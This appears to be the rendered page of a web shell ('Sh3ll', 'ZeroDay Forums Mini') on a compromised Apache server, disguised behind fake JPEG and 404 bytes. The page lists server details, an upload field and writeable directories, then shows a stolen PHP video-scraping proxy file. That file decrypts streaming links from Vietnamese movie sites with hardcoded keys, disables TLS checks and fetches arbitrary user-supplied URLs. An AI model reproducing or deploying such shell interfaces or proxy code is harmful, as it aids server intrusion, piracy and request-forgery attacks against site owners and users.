����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/vidoe.top/proxy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/vidoe.top/proxy/embed3.php
<?php
/*define('MSG_NO_ACCESS', 'No access');
$arr_bot_deny = array('googlebot','bingbot','baiduspider','ahrefsbot','semrushbot','seznambot','yoozbot','linkdexbot','mj12bot','seobilitybot','msnbot-media','facebookexternalhit',' mail.ru_bot','musobot','sogou web spider');
foreach ($arr_bot_deny as $val) {
    if(stripos($_SERVER['HTTP_USER_AGENT'],$val)!== false){
        header('HTTP/1.0 403 Forbidden');
        die();
        exit();
    }
}
$acceptedDomains = array('movieandtube.com','phim79.com');
$referer=get_domain($_SERVER['HTTP_REFERER']);
if(!$referer || !in_array($referer,$acceptedDomains))
{
    header('HTTP/1.0 403 Forbidden');
    exit(MSG_NO_ACCESS);
}*/
function get_domain($url)
{
    $pieces = parse_url($url);
    $domain = isset($pieces['host']) ? $pieces['host'] : '';
    if (preg_match('/(?P<domain>[a-z0-9][a-z0-9\-]{1,63}\.[a-z\.]{2,6})$/i', $domain, $regs))
    {
        return $regs['domain'];
    }
    return false;
}
if (substr_count($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip')){
    ob_start('ob_gzhandler');
}else{
    ob_start();
}
include 'Mobile_Detect.php';
$detect = new Mobile_Detect;
require 'GibberishAES.php';
function str_encode($data,$pwd)
{
    $x = 0;
    $a = 0;
    $j = 0;
    $Zcrypt = '';
    $pwd_length = strlen($pwd);
    for ($i = 0; $i < 255; $i++) {
        $key[$i] = ord(substr($pwd, ($i % $pwd_length)+1, 1));
        $counter[$i] = $i;
    }
    for ($i = 0; $i < 255; $i++) {
        $x = ($x + $counter[$i] + $key[$i]) % 256;
        $temp_swap = $counter[$i];
        $counter[$i] = $counter[$x];
        $counter[$x] = $temp_swap;
    }
    for ($i = 0; $i < strlen($data); $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $counter[$a]) % 256;
        $temp = $counter[$a];
        $counter[$a] = $counter[$j];
        $counter[$j] = $temp;
        $k = $counter[(($counter[$a] + $counter[$j]) % 256)];
        $Zcipher = ord(substr($data, $i, 1)) ^ $k;
        $Zcrypt .= chr($Zcipher);
    }
    return $Zcrypt;
}
function decodeCryptZingTV($text){
    $key = 'f_pk_ZingTV_1_@z';
    $iv = 'f_iv_ZingTV_1_@z';
    if($text != ''){
        $cipher = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
        $iv_size = mcrypt_enc_get_iv_size($cipher);
        if(mcrypt_generic_init($cipher, $key, $iv) != -1){
            $char = '';
            for($i=0; $i<strlen($text);$i+=2){
                $char .= chr(hexdec($text{$i}.$text{($i+1)}));
            }
            $cipherText = mdecrypt_generic($cipher,$char);
            mcrypt_generic_deinit($cipher);
            return $cipherText;
        }else{
            return false;
        }
    }
}
/*if(!function_exists (hex2bin)){
    function hex2bin($hexdata) {
        $bindata = '';
        for ($i=0;$i<strlen($hexdata);$i+=2) {
            $bindata .= chr(hexdec(substr($hexdata,$i,2)));
        }
        return $bindata;
    }
}*/
function get_content_page($url,$referer) {
    $header[0] = "Accept: text/xml,application/xml,application/xhtml+xml,";
    $header[0] .= "text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5";
    $header[] = "Cache-Control: max-age=0";
    $header[] = "Connection: keep-alive";
    $header[] = "Keep-Alive: 300";
    $header[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
    $header[] = "Accept-Language: en-us,en;q=0.5";
    $header[] = "Pragma: "; // browsers keep this blank.
    $process = curl_init($url);
    curl_setopt($process, CURLOPT_HTTPHEADER, $header);
    curl_setopt($process, CURLOPT_HEADER, array('Expect:'));
    curl_setopt($process, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36');
    //curl_setopt($process, CURLOPT_COOKIEFILE, dirname(__FILE__).'/'.'cookies_youtube.txt');
    //curl_setopt($process, CURLOPT_COOKIEJAR,  dirname(__FILE__).'/'.'cookies_youtube.txt');
    curl_setopt($process, CURLOPT_REFERER, $referer);
    curl_setopt($process, CURLOPT_ENCODING, 'gzip,deflate');
    //curl_setopt($process,CURLOPT_ENCODING , compression);
    curl_setopt($process, CURLOPT_TIMEOUT, 5);
    //if (proxy) curl_setopt($cUrl, CURLOPT_PROXY, 'proxy_ip:proxy_port');
    curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($process, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($process, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
    $return = curl_exec($process);
    curl_close($process);
    return $return;
}
function curl($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    $head[] = "Connection: keep-alive";
    $head[] = "Keep-Alive: 300";
    $head[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
    $head[] = "Accept-Language: en-us,en;q=0.5";
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36');
    curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
    //curl_setopt($ch, CURLOPT_REFERER, 'http://www.phimmoi.net');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
    $page = curl_exec($ch);
    curl_close($ch);
    return $page;
}
function CurlZing($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    $head[] = "Connection: keep-alive";
    $head[] = "Keep-Alive: 300";
    $head[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
    $head[] = "Accept-Language: en-us,en;q=0.5";
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36');
    curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
    //curl_setopt($ch, CURLOPT_REFERER, 'http://www.phimmoi.net');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));

    $page = curl_exec($ch);
    curl_close($ch);
    return $page;
}
function post($url,$data) {
    $header[0] = "Accept: text/xml,application/xml,application/xhtml+xml,";
    $header[0] .= "text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5";
    $header[] = "Cache-Control: max-age=0";
    $header[] = "Connection: keep-alive";
    $header[] = "Keep-Alive: 300";
    $header[] = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
    $header[] = "Accept-Language: en-us,en;q=0.5";
    $header[] = "Pragma: "; // browsers keep this blank.
    $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36';
    $process = curl_init($url);
    curl_setopt($process, CURLOPT_HTTPHEADER, $header);
    curl_setopt($process, CURLOPT_REFERER, 'http://www.anivn.com');
//curl_setopt($process, CURLOPT_HEADER, 1);
    curl_setopt($process, CURLOPT_USERAGENT, $user_agent);
    //curl_setopt($process, CURLOPT_COOKIEFILE, 'cookies.txt');
    // curl_setopt($process, CURLOPT_COOKIEJAR, 'cookies.txt');
    curl_setopt($process, CURLOPT_ENCODING , 'gzip');
    curl_setopt($process, CURLOPT_TIMEOUT, 10);
//if ($this->proxy) curl_setopt($process, CURLOPT_PROXY, $this->proxy);
    curl_setopt($process, CURLOPT_POSTFIELDS, $data);
    curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($process, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($process, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($process, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt($process, CURLOPT_POST, 1);
    $return = curl_exec($process);
    curl_close($process);
    return $return;
}
$url = $_GET['url'];

//code back up:
//http://hiu.vn/danh-ba/application/hooks/curl/

if(empty($url)){
    echo curl('http://dauvantay.ischool.vn/curl/check.php');
    exit();
}
//$url =  str_encode(hex2bin($url),'ngocgiac');
$pos1 = strpos($url,'phimmoi.net');
$pos2 = strpos($url,'bilutv.com');
$pos3 = strpos($url,'tv.zing.vn');
$pos4 = strpos($url,'vung.tv');
$pos5 = strpos($url,'anivn.com');
$pos6 = strpos($url,'anime47.com');
$pos7 = strpos($url,'phimbathu.com');
$pos8 = strpos($url,'youtube.com');
if($pos8!==false){
    $arr=explode('?v=',trim($url));
    $my_id = $arr[1];
    $my_video_info = 'http://www.youtube.com/get_video_info?video_id=' . $my_id . '&asv=3&el=detailpage&hl=en_US';
    $my_video_info = curl($my_video_info);
    parse_str($my_video_info);
    if (isset($url_encoded_fmt_stream_map)) {
        $my_formats_array = explode(',', $url_encoded_fmt_stream_map);

        foreach ($my_formats_array as $key=>$format) {
            parse_str($format);
            $avail_formats[$key]['itag'] = $itag;
            $avail_formats[$key]['quality'] = $quality;
            $type = explode(';', $type);
            $avail_formats[$key]['type'] = $type[0];
            $avail_formats[$key]['url'] = urldecode($url) . '&signature=' . $sig;
        }
        $show_source = '';
        foreach ($avail_formats as $key => $val) {
            $val['url'] = preg_replace("/[^\/]+\.googlevideo\.com/", "redirector.googlevideo.com", $val['url']);
            //$val['url'] = str_replace("212.237.41.75", $_SERVER['REMOTE_ADDR'], $val['url']);
            if($val['itag']=='22'){
                $show_source .= '<source src="' . $val['url'] . '" type="video/mp4" data-res="720p"/>';
            }
            if($val['itag']=='18'){
                $show_source .= '<source src="' . $val['url'] . '" type="video/mp4" data-res="36p"/>';
            }
        }
        $default_res = '720p';
        exit($show_source);

    }
}
if($pos7!==false) {
    define("key", "phimbathu.com4590481877");
    $arr_url2 = explode('-',$url);
    $id_phim = intval(str_replace('.html', '', $arr_url2[count($arr_url2) - 1]));
    $content1 = curl($url);
    preg_match('#var playerSetting \= (.*?)\}\;#is',$content1,$match1);
    $text= '['.$match1[1].'}]';
    $arr = json_decode($text,true);
    print_r($arr);
    exit();
    preg_match('#var linkPlay \= \"(.*?)\"\;#is', $content1, $match1);
    $ajax_url = 'http://phimbathu.com'.$match1[1];
    echo $ajax_url.'<br>';
    $content2 = curl($ajax_url);
    $arr_source = json_decode($content2,true);
    $link_encode = '';
    foreach ($arr_source as $key=>$val){
        if($val[0]['type']=='drive'){
            $link_encode = $val[0]['file'];
        }
    }
    $link_decode = GibberishAES::dec($link_encode, constant("key") . $id_phim);
    echo $link_decode.'<br>';
    preg_match_all('#file\/d\/(.*?)\/#is',$link_decode,$match_all);
    $id = $match_all[1][0];
    $show_source = '';
    echo 'http://212.237.53.63/proxy/drive_api.php?id='.$id;
    exit();
    $file = curl('http://212.237.53.63/proxy/drive_api.php?id='.$id);

    $arr = json_decode($file,true);
    $show_source = '<source src="' . trim($arr['link']) . '" type="'.$arr['type'].'" data-res="720p"/>';
    echo $show_source;
    exit();
    $arr_content = json_decode('[' . $match1[1] . ']', true);
    print_r($match1);
    exit();
    $show_source = '';
    if ($detect->isMobile() or $detect->isTablet()) {
        foreach ($arr_content as $key => $val) {
            if ($val['label'] == '360p') {
                $link_decode = GibberishAES::dec($val['file'], constant("key") . $id_phim);
                $show_source = '<source src="' . $link_decode . '" type="video/mp4" data-res="' . $val['label'] . '"/>';
            }
        }
        $default_res = '360p';
    } else {
        foreach ($arr_content as $key => $val) {
            $link_decode = GibberishAES::dec($val['file'], constant("key") . $id_phim);
            $show_source .= '<source src="' . $link_decode . '" type="video/mp4" data-res="' . $val['label'] . '"/>';
        }
        $default_res = '720p';
    }
}
if($pos6!==false){
    require '../lib/cryptojs-aes/cryptojs-aes.php';
    $content = curl('http://hiu.vn/danh-ba/application/hooks/helps/run.php?url='.$url);

    preg_match('#iframe src=(.*?)scrolling#is',$content,$match);
    $match[1] = str_replace(array('\"','\"'),array('',''),trim($match[1]));
    echo $match[1];
    exit();
    preg_match_all('#drive\.google\.com\/file\/d\/(.*?)\/view#is',$content,$match);


    $link1 = 'https://drive.google.com/file/d/'.$match[1][count($match[1])-1].'/view';
    $link2 = '';
    if(!empty($match[1][count($match[1])-2])) {
        $link2 = 'https://drive.google.com/file/d/'.$match[1][count($match[1]) - 2].'/view';
    }
    $link3 = '';
    if(!empty($match[1][count($match[1])-3])) {
        $link3 = 'https://drive.google.com/file/d/'.$match[1][count($match[1]) - 3].'/view';
    }

    $content = curl('http://hiu.vn/danh-ba/application/hooks/helps/post.php?url='.$link1.'&ref='.$url);

    

    echo 'Link1: '.$link1.'<br>';

    if(!empty($content)){
        $content = base64_decode($content);
        $arr = cryptoJsAesDecrypt('chieunaylathuhai',$content);
        $arr = json_decode($arr,true);
        echo 'Arr 1:<br> ';
        print_r($arr);
        if($arr['link']['error']!=''){
            if($link2!='') {
                echo '<br>Link2: '. $link2.'<br>';
                $content2 = curl('http://212.237.53.63/curl22/post.php?url=' . $link2.'&ref='.$url);
                $content2 = base64_decode($content2);
                echo '<br>Content2: '.$content2;
                $arr2 = cryptoJsAesDecrypt('chieunaylathuhai', $content2);
                $arr2 = json_decode($arr2, true);
                echo 'Arr 2:<br> ';
                print_r($arr2);
                exit();
            }
            if($arr['link']['error']!=''){
                if($link3!='') {
                    echo '<br>Link3: '.$link3.'<br>';;
                    $content = curl('http://212.237.53.63/curl22/post.php?url=' . $link3.'&ref='.$url);
                    $content = base64_decode($content);
                    $arr = cryptoJsAesDecrypt('chieunaylathuhai', $content);
                    $arr = json_decode($arr, true);
                    echo 'Arr 3:<br> ';
                    print_r($arr);
                    exit();
                }
            }
        }

    }else{
        exit('Video error, we will fix this soon by soon we can!');
    }
    echo $content;
    exit();
}
if($pos5!==false){
    $content = curl('http://dauvantay.ischool.vn/curl/get_page_anivn.php?url='.trim($url));
    preg_match('#docid\=(.*?)\&#is',$content,$match);
    echo $match[1];
    exit();
        preg_match('#sources\: \[(.*?)\]\,#is', $content, $match);

        if(empty($match[1])){
            $tmp = explode("file/d/", $content);
            $tmp2 = explode("/", $tmp[1]);
            $id = $tmp2[0];
            echo $id;
            exit();

        }


        $json = '['.str_replace(array('file','label','type',': ',', '),array('"file"','"label"','"type"',':',','),$match[1]).']';
    $json = str_replace('},]','}]',$json);


        $arr = json_decode($json,true);

        $show_source = '';
        if ($detect->isMobile() or $detect->isTablet()) {
            foreach ($arr as $key => $val) {
                if ($val['label'] == '360p') {
                    $show_source = '<source src="' . $val['file'] . '" type="video/mp4" data-res="' . $val['label'] . '"/>';
                }
            }
            $default_res = '360p';
        } else {
            foreach ($arr as $key => $val) {
                $show_source .= '<source src="' . $val['file'] . '" type="video/mp4" data-res="' . $val['label'] . '"/>';
            }
            $default_res = '720p';
        }

}
if($pos1!==false){
    define("key", "PhimMoi.Net@");
    $content1 = curl('http://hiu.vn/danh-ba/application/hooks/curl/get_page_phimmoi.php?url='.base64_encode($url));
    preg_match('#episodeinfo-v1\.1\.php(.*?)\"#is',$content1,$match1);
    $url2 = 'http://episode.phimmoi.net/episodeinfo-v1.1.php'.$match1[1];
    echo $url2;
    $parts = parse_url($url2);
    parse_str($parts['query'], $query);
    $id_epi = $query['episodeid'];
    //$content2 = curl($url2);
    $content2 = curl('http://hiu.vn/danh-ba/application/hooks/curl/get_page_phimmoi_detail.php?url='.base64_encode($url2));
    echo $content2;
    exit();
    if(!empty($content2)) {
        preg_match('#var _responseJson=\'(.*?)\';#is', $content2, $match2);
        $arr_content = json_decode($match2[1],true);
        $show_source = '';
        print_r($arr_content['medias']);
        exit();
        if($detect->isMobile() or $detect->isTablet()) {
            foreach ($arr_content['medias'] as $key => $val) {
                if($val['resolution']=='360') {
                    $link_decode = GibberishAES::dec($val['url'], constant("key") . $id_epi);
                    $show_source = '<source src="' . $link_decode . '" type="video/mp4" data-res="' . $val['resolution'] . 'p"/>';
                }
            }
            $default_res = '360p';
        }else {
            foreach ($arr_content['medias'] as $key => $val) {
                $link_decode = GibberishAES::dec($val['url'], constant("key") . $id_epi);
                $show_source .= '<source src="' . $link_decode . '" type="video/mp4" data-res="' . $val['resolution'] . 'p"/>';
            }
            $default_res = '720p';
        }

    }else{
        echo '<div class="content" style="color: #ffffff;">
        <h1 id="unavailable-message" class="message">
                  We\'re processing this video.
        </h1>
        <div id="unavailable-submessage" class="submessage">
    Please check back later. Try <a href="javascript:void(0);" onclick="location.reload();">click here</a> for reload video.
        </div>
      </div>';
        exit();
    }
}
if($pos2!==false){
    define("key", "bilutv.com4590481877");
    $arr_url =  explode('_',$url);
    $arr_url2 = explode('-',$arr_url[0]);
    $id_phim = intval(str_replace('.html','',$arr_url2[count($arr_url2)-1]));
    $content1 = curl($url);
    preg_match('#var playerSetting \= (.*?)\}\;#is',$content1,$match1);
    $text= '['.$match1[1].'}]';
    $arr = json_decode($text,true);
    foreach ($arr[0] as $key=>$val){
        echo $key.'<br>';
    }

    print_r($arr);
    exit();
    if($match1[1]==''){

        preg_match('#\"file\"\:\"(.*?)\"\,\"#is',$content1,$match1);
        $link_decode = GibberishAES::dec($match1[1], constant("key") . $id_phim);
        if($link_decode!=''){
            echo '<iframe src="'.$link_decode.'" width="100%" height="100%" frameborder="0" allowfullscreen></iframe>';
            exit();
        }else {
            preg_match('#\"sources\"\:\"(.*?)\"\,#is', $content1, $match1);
            $arr_you = explode('?v=', $match1[1]);
            echo '<iframe src="https://www.youtube.com/embed/' . $arr_you[1] . '/?autoplay=1&partnerid=30&html5=1&controls=1&showinfo=0&rel=0&modestbranding=0&playsinline=1&enablejsapi=1&widgetid=1" width="100%" height="100%" frameborder="0" allowfullscreen></iframe>';
            exit();
        }
    }
    $arr_content = json_decode('['.$match1[1].']',true);

    foreach ($arr_content as $key => $val) {
        $link_decode = GibberishAES::dec($val['file'], constant("key") . $id_phim);
        echo $link_decode.'<br>';

    }
    print_r($arr_content);
    exit();
    $show_source = '';
    if($detect->isMobile() or $detect->isTablet()) {
        foreach ($arr_content as $key => $val) {
            if($val['label']=='360p') {
                $link_decode = GibberishAES::dec($val['file'], constant("key") . $id_phim);
                $show_source = '<source src="' . $link_decode . '" type="video/mp4" data-res="' . $val['label'] . '"/>';
            }
        }
        $default_res = '360p';
    }else {
        foreach ($arr_content as $key => $val) {
            $link_decode = GibberishAES::dec($val['file'], constant("key") . $id_phim);
            $show_source .= '<source src="' . $link_decode . '" type="video/mp4" data-res="' . $val['label']. '"/>';
        }
        $default_res = '720p';
    }
}
if($pos3!==false){
    //$id_zing = str_replace('.html','',basename($url));
    //$url = 'http://tv.zing.vn/xml/video/'.$id_zing;
    //$url = 'http://dauvantay.ischool.vn/curl/get_page_zingtv.php?url='.$url;
    $url = 'http://hiu.vn/danh-ba/application/hooks/curl/get_page_zingtv.php?url=' . $url;
    $content = curl($url);
    preg_match_all('#source\: \"(.*?)\"\,#is',$content,$match);
    print_r($match[1]);
    exit();

    $p360 = $match[1];
    $arr = explode('var label720 = "720p(VIP)";',$content);
    preg_match('#video720 \= \"(.*?)\"\;#is',$arr[1],$match2);
    $p720 = '';
    if(!empty($match2[1])) {
        $p720 = $match2[1];
    }
    preg_match('#video1080 \= \"(.*?)\"\;#is',$arr[1],$match3);
    $p1080 = '';
    if(!empty($match3[1])) {
        $p1080 = $match3[1];
    }

    print_r($match3[1]);
    exit();


    $xml_string = str_replace(array("<![CDATA[","]]>"),array("",""), $content1);

    $xml_string = preg_replace('#&(?=[a-z_0-9]+=)#', '&amp;', $xml_string); // chuyển đổi các ký tự đặc biệt

    $xml_arr = json_decode(json_encode((array) simplexml_load_string($xml_string)), 1); // chuyển đôi xml sang array

    $show_source = '';
    if($xml_arr['item']){ // kiểm tra $xml_arr['item'] có không
        $item = $xml_arr['item'];
        $f360 = decodeCryptZingTV($item['source']);
        $f480 = decodeCryptZingTV($item['f480']);
        $arr1 = explode('?',$f360);
        $arr2 = explode('?',$f480);
        $type = 'video/mp4';
        if($detect->isMobile() or $detect->isTablet()) {
            foreach ($arr_content as $key => $val) {
                $show_source = '<source src="' .$arr1[0]. '" type="video/mp4" data-res="360p"/>';
            }
            $default_res = '360p';
        }else {
            $show_source .= '<source src="' .$arr1[0]. '" type="video/mp4" data-res="360p"/>';
            $show_source .= '<source src="' . $arr2[0]. '" type="video/mp4" data-res="480p"/>';
            $default_res = '480p';
        }
        $poster        = $item['cover']; // cover
    }
}
if($pos4!==false){
    $arr = explode('-',$url);
    $id = $arr[count($arr)-1];
    $url2 = 'http://vung.tv/embed/tracking?type=b&data='.$id.'&n=0';
    $content = curl('http://hiu.vn/danh-ba/application/hooks/curl/get_page_vungtv_detail.php?url='.base64_encode($url2));
    $content = str_replace(array('{','}1','null'), array('[{','}]','"null"'),trim($content));

    $arr2 = json_decode($content,true);
    $arr3 = json_decode(base64_decode($arr2[0]['e']),true);
    exit($arr3[0]);
    $arr2 = json_decode('['.trim($content).']',true);
    print_r($arr2);
    exit();
    preg_match('#<iframe src="(.*?)?"#is',$content,$match);
    print_r(get_headers($match[1], 1));
    echo $match[1];
    exit();
    $content2 = curl('http://hiu.vn/danh-ba/application/hooks/curl/get_page_vungtv_detail.php?url='.$match[1]);

    echo $content2;
    exit();

    preg_match('#sources\: \'(.*?)\'\,hash#is',$content2,$match);
    $content3= base64_decode($match[1]);

    $arr = json_decode($content3,true);
    print_r($arr);
    exit();
    $type = 'video/mp4';
    $show_source = '';
    $label = '360p';
    if(!empty($arr)) {
        foreach ($arr as $key => $val) {
            if(strpos($val['file'],'.m3u8')!==false){
                $type = 'application/x-mpegURL';
            }
            if($val['label']==''){
                $val['label'] = $label;
            }
            $show_source .= '<source src="' .$val['file']. '" type="'.$type.'" data-res="'.$val['label'].'"/>';
        }
        if($detect->isMobile() or $detect->isTablet()) {
            $default_res = '360p';
        }else{
            $default_res = '720p';
        }
    }
    echo $show_source;
    exit();

}
?>
    <html>
    <head>
        <title>-Server movieantube-phimle1 embed-</title>
        <style type="text/css">
            body {
                background: #000000;
                margin: 0px;
                padding: 0px;
            }
        </style>
        <link href="http://movieandtube.com/proxy/jscript/video_js/video-js.css" rel="stylesheet" type="text/css" />
        <script src="http://movieandtube.com/proxy/jscript/video_js/video.js"></script>
        <link href="http://movieandtube.com/proxy/jscript/video_js/button-styles.css" rel="stylesheet" type="text/css" />
        <script src="http://movieandtube.com/proxy/jscript/video_js/video-quality-selector.js"></script>
        <script>
            videojs.options.flash.swf = "http://movieandtube.com/proxy/jscript/video_js/video-js.swf";
        </script>

    </head>

    <body style="width: 100%; height: 100%"  oncontextmenu="return false;">
    <video id="ht_player" width="100%" height="100%" class="video-js vjs-default-skin" preload="none" poster=" " data-setup="{ }" autoplay controls>
        <?php echo $show_source;?>
        <p>Video Playback Not Supported</p>
    </video>
    <script type="text/javascript">
        videojs( '#ht_player', { plugins : { resolutionSelector : {
            default_res : '<?php echo $default_res;?>'
        } } }, function() {
            var player = this;
            player.on( 'changeRes', function() {
                console.log( 'Current Res is: ' + player.getCurrentRes() );
            });
        });
    </script>
    </body></html>
<?php
ob_end_flush();
exit();
?>

ZeroDay Forums Mini